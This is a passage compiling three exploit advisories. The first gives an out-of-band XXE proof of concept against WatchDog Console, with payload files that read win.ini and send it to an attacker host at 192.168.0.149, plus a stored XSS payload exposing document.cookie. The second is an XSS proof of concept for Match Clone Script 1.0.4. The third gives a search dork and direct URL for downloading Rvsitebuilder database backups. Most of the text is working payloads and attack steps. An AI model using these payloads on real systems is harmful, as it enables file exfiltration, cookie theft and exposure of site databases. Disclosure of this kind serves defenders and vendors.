system files remotely through XXE

On attacking machine
– Create data.xml with following contents in apache root and start apache listening on 80
<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM “http://192.168.0.149:8080/evil.xml”>
%sp;
%param1;
]>
<r>&exfil;</r>

– Create evil.xml with the following contents anywhere
<?xml version=”1.0″ encoding=”UTF-8″?>
<!ENTITY % data SYSTEM “file:///c:/windows/win.ini”>
<!ENTITY % param1 “<!ENTITY exfil SYSTEM ‘http://192.168.0.149:8080/?%data;’>”>

– Start python simple http server in same directory as evil.xml, listening on 8080
python -m SimpleHTTPServer 8080

On victim machine (1 of 2 ways)
1. With admin access to application console, add attacking server IP address under servers tab
or
2. With local access to system
– update ‘C:\ProgramData\WatchDog Console\servers.xml file’ with following:
<?xml version=”1.0″ encoding=”utf-8″ standalone=”yes”?>
<servers>
<server host=”192.168.0.149″ addrType=”http” port=”80″ description=”” selEmail=”True” Username=”1″ Password=”1″ left=”700″ top=”420″ />
</servers>
– restart system

On attacking machine
– Contents of ‘win.ini’ is outputted to console
– evil.xml can be updated to read other sensitive files (tested reading file from admin desktop)

### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ###
This application suffers from authenticated XSS on several inputs (1 of 2 ways)
1. With admin access to application console, under servers tab
– add dummy IP in server name filed
– add <script>alert(document.cookie)</script>”> into server description
or
2. With local access to system
– update ‘C:\ProgramData\WatchDog Console\servers.xml file’ with following:
<?xml version=”1.0″ encoding=”utf-8″ standalone=”yes”?>
<servers>
<server host=”172.16.1.1″ addrType=”http” port=”80″ description=”<script>alert(document.cookie)</script>”>” selEmail=”True” Username=”1″ Password=”1″ left=”400″ top=”180″ />
</servers>
– restart system

3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot.

Timeline
———————————————————————
04-14-18: Vendor notified of vulnerabilities
04-16-18: Vendor responded “Thank you for bringing this to our attention. The product has now been End-of-life for
several years and is no longer receiving updates.”
04-17-18: Submitted public disclosure

Match Clone Script 1.0.4 Cross Site Scripting

Match Clone Script 1.0.4 Cross Site Scripting
Posted Apr 18, 2018
Authored by ManhNho

Match Clone Script version 1.0.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-9857
MD5 | 056162856f9fe31ccf79ec69a6eb04f0
########################################################################
# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
# Date: 23.02.2018
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/match-clone/
# Category: Web Application
# Exploit Author: ManhNho
# Version: 1.0.4
# Tested on: Window 10 / Kali Linux
# CVE: CVE-2018-9857
##########################################################################
Description
------------------------
PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to
searchbyid.php (aka the "View Search By Id" screen).

Proof of Concept
------------------------
1. Access to site
2. Choose aSearcha
3. Choose "View Search By Id"
3. Put <script>alert('ManhNho')</script> in search field
4. You will be having a popup: ManhNho

References:
------------------------
https://pastebin.com/Y9uEC4nu
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857

Rvsitebuilder CMS Database Backup Download

# Exploit Title: Rvsitebuilder CMS Database Backup Download
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Software Link: http://www.rvsitebuilder.com
# Version: All Version
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

Exploit :
Http://Target/rvsDbBackup.sql